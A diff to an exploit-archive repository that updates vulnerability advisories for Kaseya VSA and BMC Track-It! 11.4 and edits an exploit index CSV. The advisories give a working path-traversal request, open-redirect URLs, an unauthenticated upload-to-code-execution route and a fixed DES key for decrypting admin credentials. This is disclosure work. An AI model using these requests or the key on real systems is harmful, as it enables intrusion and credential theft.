+User input is passed directly into unserialize(). +Low risk as currently there are no exploitable methods in CMS Made Simple core. Worth keeping an eye on as they are not going to fix it anytime soon, or trail through the dozens of available plugins to see if there's an exploitable method there. + +References: +https://www.owasp.org/index.php/PHP_Object_Injection +http://www.alertlogic.com/writing-exploits-for-exotic-bug-classes/ +http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf +http://vagosec.org/2013/12/wordpress-rce-exploit/ + + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/windows/webapps/37621.txt b/exploits/windows/webapps/37621.txt index 78d72a6dd..b3762dd70 100644 --- a/exploits/windows/webapps/37621.txt +++ b/exploits/windows/webapps/37621.txt @@ -1,43 +1,32 @@ -tl;dr -Two vulns in Kaseya Virtual System Administrator - an authenticated -arbitrary file download and two lame open redirects. - -Full advisory text below and at [1]. Thanks to CERT for helping me to -disclose these vulnerabilities [2]. - ->> Multiple vulnerabilities in Kaseya Virtual System Administrator +>> Multiple vulnerabilities in Kaseya Virtual System Administrator >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== -Disclosure: 13/07/2015 / Last updated: 13/07/2015 +Disclosure: 13/07/2015 / Last updated: 28/09/2015 >> Background on the affected product: -"Kaseya VSA is an integrated IT Systems Management platform that can -be leveraged seamlessly across IT disciplines to streamline and -automate your IT services. Kaseya VSA integrates key management -capabilities into a single platform. Kaseya VSA makes your IT staff -more productive, your services more reliable, your systems more -secure, and your value easier to show." +"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show." + +A special thanks to CERT and ZDI for assisting with the vulnerability reporting process. +These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015. >> Technical details: #1 Vulnerability: Arbitary file download (authenticated) -Affected versions: unknown, at least v9 +CVE-2015-2862 / CERT ID 919604 +Affected versions: unknown, at least v7 to v9.1 GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini Referer: http://10.0.0.3/ -A valid login is needed, and the Referrer header must be included. A -sample request can be obtained by downloading any file attached to any -ticket, and then modifying it with the appropriate path traversal. -This will download the C:\boot.ini file when Kaseya is installed in -the default C:\Kaseya directory. The file download root is the -WebPages directory (\WebPages\). +A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal. +This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (\WebPages\). #2 Vulnerability: Open redirect (unauthenticated) -Affected versions: unknown, at least v7 to XXX +CVE-2015-2863 / CERT ID 919604 +Affected versions: unknown, at least v7 to v9.1 a) http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com @@ -48,16 +37,17 @@ Host: www.google.com (host header has to be spoofed to the target) ->> Fix: +>> Fix: R9.1: install patch 9.1.0.4 R9.0: install patch 9.0.0.14 R8.0: install patch 8.0.0.18 V7.0: install patch 7.0.0.29 + +>> References: +[1] https://www.kb.cert.org/vuls/id/919604 + ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ ->> Enabling secure digital business >> - -[1] https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt -[2] https://www.kb.cert.org/vuls/id/919604 \ No newline at end of file +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/windows/webapps/43883.txt b/exploits/windows/webapps/43883.txt new file mode 100644 index 000000000..7b351cfab --- /dev/null +++ b/exploits/windows/webapps/43883.txt @@ -0,0 +1,93 @@ +>> Multiple critical vulnerabilities in BMC Track-It! 11.4 +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +================================================================================= +Disclosure: 04/07/2016 / Last updated: 01/01/2017 + + +>> Background and summary +BMC Track-It! exposes several .NET remoting services on port 9010. .NET remoting is a remote method technology similar to Java RMI or CORBA which allows you to invoke methods remotely and retrieve their result. + +These remote methods are used when a technician uses the Track-It! client console to communicate with the central Track-It! server. A technician would invoke these methods for obtaining tickets, creating a new ticket, uploading files to tickets, etc. + +On October 2014, two 0 day vulnerabilities for Track-It! 11.3 were disclosed (under CVE-2014-4872, see [1]). The vulnerabilities were due +to the Track-It! server accepting remote method invocations without any kind of authentication or encryption. The vulnerabilities were very severe: one allowed an attacker to execute code on the server as NETWORK SERVICE or SYSTEM, while the other would allow an attacker to obtain the domain administrator and SQL server passwords if the Track-It! server had password reset turned on. + +These vulnerabilities were discovered in a trivial manner - simply by turning Wireshark on and observing the packets one could see the remote method invocations and objects being passed around. Duplicate and even triplicate packets would not be rejected by the server, which would execute whatever action was requested in the packet. + +Disclosure was done by the US-CERT, which attempted to contact BMC but received no response after 45 days. After this period they released the vulnerability information and I released two Metasploit exploits. + +BMC contacted me asking for advice on how to fix the issues, to which I responded: +"For #1 [file upload] and #2 [domain admin pass disclosure] the fix is to implement authentication and authorisation. There is no other way to fix it. +[...] Make sure the auth is done properly. You will have to negotiate some kind of session key using the user's credential at the start and use that session key for encryption going forward. Do not use a fixed key, as this can be reverse engineered. +If you don't implement such mechanism, it's just a question of time before someone else breaks your protection and finds new vulnerabilities." + +On December 9th 2014, BMC released Track-It! 11.4 [2], which they claimed had fixed the security vulnerabilities. + +At first glance, this seemed to be true. Traffic in Wireshark did seem to be encrypted. However upon further inspection, it became obvious that while the actual method invocation and its arguments were being encrypted using a DES key, there was still no authentication being done. +What this means in practice is that anyone can negotiate a new encryption key with the server and use that from then on to invoke remote methods without ever authenticating to the server, even for the initial encryption key exchange. + +The code can be inspected by decompiling TrackIt.Utility.Common.dll. The interesting part is in: +namespace TrackIt.Utility.Common.Remoting +{ + internal enum SecureTransaction + { + Uninitialized, + SendingPublicKey, + SendingSharedKey, + SendingEncryptedMessage, + SendingEncryptedResult, + UnknownIdentifier, + UnauthenticatedClient + } +} +This represents the state machine that the server uses to track client requests. The initial state is UnauthenticatedClient for any unknown client. A typical communication would be as follows: +1- Client generates a RSA key, which it shares with the server by sending a Modulus and an Exponent. +2- Server creates a DES key and sends that key back to the client +3- Client and server now share an encryption key; that key is used to pass back messages back and forth (states SendingEncryptedMessage and SendingEncryptedResult). + +As it is evident, at no point there is any authentication or credentials being passed from the client to the server. So while all traffic is encrypted, anyone can negotiate an encryption key with the server and invoke any remote method. + +From here on, building an exploit is trivial. All that is needed is to import the library DLL's from the Track-It! client application and invoke the methods in the code. + +A special thanks to SecuriTeam Secure Disclosure (SSD), which have assisted me in disclosing this vulnerability to BMC. Their advisory can be found at https://blogs.securiteam.com/index.php/archives/2713. + +Exploit code for this vulnerability has been released, and can be found in the same github repository as this advisory [3]. + + +>> Technical details: +#1 +Vulnerability: Remote code execution via file upload +CVE-2016-6598 +Attack Vector: Remote +Constraints: None; exploitable by an unauthenticated attacker +Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar) + +The application exposes an unauthenticated .NET remoting file storage service (FileStorageService) on port 9010. +This service contains a method that allows uploading a file to an arbitrary path on the machine that is running Track-It!. This can be used to upload a file to the web root and achieve code execution as NETWORK SERVICE or SYSTEM. + + +#2 +Vulnerability: Domain administrator and SQL server user credentials disclosure +CVE-2016-6599 +Attack Vector: Remote +Constraints: None; exploitable by an unauthenticated attacker +Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar) + +The application exposes an unauthenticated .NET remoting configuration service (ConfigurationService) on port 9010. +This service contains a method that can be used to retrieve a configuration file that contains the application database name, username and password as well as the domain administrator username and password. These are encrypted with a fixed key and IV ("NumaraIT") using the DES algorithm. The domain administrator username and password can only be obtained if the Self-Service component is enabled, which is the most common scenario in enterprise deployments. + + +>> Fix: +Upgrade to BMC Track-It! 11.5 or above. + + +>> References: +[1] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/bmc-track-it-11.3.txt +[2] https://communities.bmc.com/community/bmcdn/bmc_track-it/blog/2014/12/09/track-it-114-is-now-available +[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43883.zip) + + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 752435259..47e430b80 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -643,7 +643,7 @@ id,file,description,date,author,type,platform,port 4379,exploits/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow (PoC)",2007-09-08,rgod,dos,windows, 4403,exploits/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,dos,windows, 4409,exploits/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,dos,windows, -4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware, +4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware, 4432,exploits/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",dos,multiple, 4474,exploits/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow",2007-10-01,shinnai,dos,windows, 4479,exploits/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service",2007-10-01,rgod,dos,windows, @@ -786,7 +786,7 @@ id,file,description,date,author,type,platform,port 6372,exploits/windows/dos/6372.html,"Google Chrome 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,dos,windows, 6386,exploits/windows/dos/6386.html,"Google Chrome 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,dos,windows, 6391,exploits/windows/dos/6391.html,"Flock Social Web Browser 1.2.5 - 'loop' Remote Denial of Service",2008-09-06,LiquidWorm,dos,windows, -6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",dos,hardware, +6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",dos,hardware, 6424,exploits/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",dos,windows, 6434,exploits/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,dos,windows, 6458,exploits/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,dos,windows, @@ -1897,7 +1897,7 @@ id,file,description,date,author,type,platform,port 16193,exploits/windows/dos/16193.pl,"Avira AntiVir - '.QUA' File 'avcenter.exe' Local Crash (PoC)",2011-02-19,KedAns-Dz,dos,windows, 16204,exploits/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,dos,windows, 16190,exploits/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows, -16191,exploits/windows/dos/16191.pl,"Novell ZenWorks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows, +16191,exploits/windows/dos/16191.pl,"Novell ZENworks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows, 16192,exploits/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,linux, 16254,exploits/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,dos,windows, 16203,exploits/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,dos,windows, @@ -2312,7 +2312,7 @@ id,file,description,date,author,type,platform,port 19507,exploits/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",dos,solaris, 19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware, 19531,exploits/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",dos,hardware, -19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",dos,multiple, +19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",dos,multiple, 19541,exploits/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",dos,novell, 19562,exploits/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",dos,windows, 19563,exploits/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",dos,windows, @@ -2510,7 +2510,7 @@ id,file,description,date,author,type,platform,port 20655,exploits/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,dos,windows, 20656,exploits/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,dos,windows, 20659,exploits/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",dos,multiple, -20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service",2001-02-28,joetesta,dos,windows, +20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - 'GET_ Denial of Service",2001-02-28,joetesta,dos,windows, 20664,exploits/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",dos,windows, 20681,exploits/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,dos,windows, 20682,exploits/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,dos,windows, @@ -2526,7 +2526,7 @@ id,file,description,date,author,type,platform,port 20750,exploits/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflows",2001-04-13,"eeye security",dos,linux, 20753,exploits/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",dos,cgi, 20763,exploits/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy - Denial of Service",2001-04-16,"SecureXpert Labs",dos,windows, -20770,exploits/windows/dos/20770.txt,"GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,dos,windows, +20770,exploits/windows/dos/20770.txt,"GoAhead Web Server 2.1 (Windows) - Denial of Service",2001-04-17,nemesystm,dos,windows, 20771,exploits/windows/dos/20771.txt,"Simpleserver WWW 1.0.x - AUX Directory Denial of Service",2001-04-17,nemesystm,dos,windows, 20779,exploits/windows/dos/20779.pl,"Oracle 8 Server - 'TNSLSNR80.EXE' Denial of Service",2001-04-18,r0ot@runbox.com,dos,windows, 20783,exploits/windows/dos/20783.txt,"Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds Denial of Service",2001-04-18,3APA3A,dos,windows, @@ -2602,7 +2602,7 @@ id,file,description,date,author,type,platform,port 21177,exploits/windows/dos/21177.txt,"Microsoft IIS 5.0 - False Content-Length Field Denial of Service",2001-12-11,"Ivan Hernandez Puga",dos,windows, 40757,exploits/windows/dos/40757.xhtml,"Microsoft Internet Explorer 11 - MSHTML CMap­Element::Notify Use-After-Free (MS15-009)",2016-11-14,Skylined,dos,windows, 21181,exploits/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0 / Mozilla 0.9.6 / Opera 5.1 - Image Count Denial of Service",2001-12-11,"Pavel Titov",dos,multiple, -21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,dos,linux, +21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPd 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,dos,linux, 21213,exploits/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,dos,multiple, 21224,exploits/linux_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,dos,linux_x86-64, 21228,exploits/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",dos,windows, @@ -3160,7 +3160,7 @@ id,file,description,date,author,type,platform,port 24042,exploits/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",dos,windows, 24051,exploits/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",dos,windows, 24066,exploits/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",dos,multiple, -24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple, +24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple, 24078,exploits/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,dos,linux, 24080,exploits/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,dos,windows, 24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)",2004-05-06,"Joel Eriksson",dos,linux, @@ -3515,7 +3515,7 @@ id,file,description,date,author,type,platform,port 27211,exploits/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities",2006-02-14,ZwelL,dos,multiple, 27212,exploits/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",dos,multiple, 27232,exploits/hardware/dos/27232.txt,"Nokia N70 - L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",dos,hardware, -27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,dos,hardware, +27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service",2006-02-16,l0om,dos,hardware, 27246,exploits/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,dos,linux, 27253,exploits/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",dos,linux, 27257,exploits/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution",2006-02-22,"Georgi Guninski",dos,linux, @@ -5260,6 +5260,7 @@ id,file,description,date,author,type,platform,port 43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows, 43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows, 43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa & Stefano Farletti",dos,hardware, +43891,exploits/hardware/dos/43891.txt,"Lorex LH300 Series - ActiveX Buffer Overflow (PoC)",2015-01-18,"Pedro Ribeiro",dos,hardware, 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx, 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows, 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows, @@ -5782,7 +5783,7 @@ id,file,description,date,author,type,platform,port 43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",dos,windows, 43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,dos,multiple, 43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",dos,windows, -43119,exploits/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware, +43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware, 43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows, 43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows, 43131,exploits/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",dos,windows, @@ -7362,7 +7363,7 @@ id,file,description,date,author,type,platform,port 17966,exploits/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)",2011-10-10,Metasploit,local,windows, 17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,local,windows, 17985,exploits/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,local,windows, -18040,exploits/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change",2011-10-28,vladz,local,linux, +18040,exploits/linux/local/18040.c,"X.Org xorg 1.4 < 1.11.2 - File Permission Change",2011-10-28,vladz,local,linux, 18027,exploits/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Local Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,local,windows, 18038,exploits/windows/local/18038.rb,"GTA SA-MP - 'server.cfg' Local Buffer Overflow (Metasploit)",2011-10-26,Metasploit,local,windows, 18064,exploits/linux/local/18064.sh,"Calibre E-Book Reader - Local Privilege Escalation (1)",2011-11-02,zx2c4,local,linux, @@ -9172,9 +9173,10 @@ id,file,description,date,author,type,platform,port 43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows, 43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows, 43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows, -43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows, +43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows, 43878,exploits/multiple/local/43878.md,"Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape",2018-01-24,SecuriTeam,local,multiple, 43879,exploits/windows/local/43879.txt,"Blizzard Update Agent - JSON RPC DNS Rebinding",2018-01-23,"Google Security Research",local,windows,1120 +43887,exploits/multiple/local/43887.txt,"ICU library 52 < 54 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",local,multiple, 40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows, 40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, 40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows, @@ -10311,7 +10313,7 @@ id,file,description,date,author,type,platform,port 4715,exploits/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",remote,windows, 4720,exploits/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,remote,windows, 4724,exploits/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,remote,windows,80 -4744,exploits/hardware/remote/4744.txt,"rooter VDSL Device - Goahead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware, +4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware, 4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows, 4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows, 4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows, @@ -10381,7 +10383,7 @@ id,file,description,date,author,type,platform,port 5205,exploits/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Remote Buffer Overflow",2008-02-29,Elazar,remote,windows, 5212,exploits/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,remote,windows, 5213,exploits/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",remote,windows, -5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,remote,multiple, +5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,remote,multiple, 5224,exploits/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,remote,linux, 5228,exploits/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",remote,windows, 5230,exploits/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",remote,windows, @@ -11825,7 +11827,7 @@ id,file,description,date,author,type,platform,port 17656,exploits/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,remote,windows, 17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows, 17670,exploits/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",remote,hardware, -17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,remote,windows, +17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow",2011-08-15,nion,remote,windows, 17672,exploits/windows/remote/17672.html,"Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free",2011-08-16,mr_me,remote,windows, 17691,exploits/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)",2011-08-19,Metasploit,remote,multiple, 17692,exploits/windows/remote/17692.rb,"Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,remote,windows, @@ -12063,7 +12065,7 @@ id,file,description,date,author,type,platform,port 19247,exploits/linux/remote/19247.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (3)",1999-06-15,"eeye security",remote,linux, 19248,exploits/windows/remote/19248.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (4)",1999-06-15,"Greg Hoglund",remote,windows, 19251,exploits/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,remote,linux, -19253,exploits/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,remote,linux, +19253,exploits/linux/remote/19253.txt,"Debian 2.1 - HTTPd",1999-06-17,anonymous,remote,linux, 19266,exploits/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Remote Stack Overflow",2012-06-18,modpr0be,remote,windows, 19288,exploits/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD 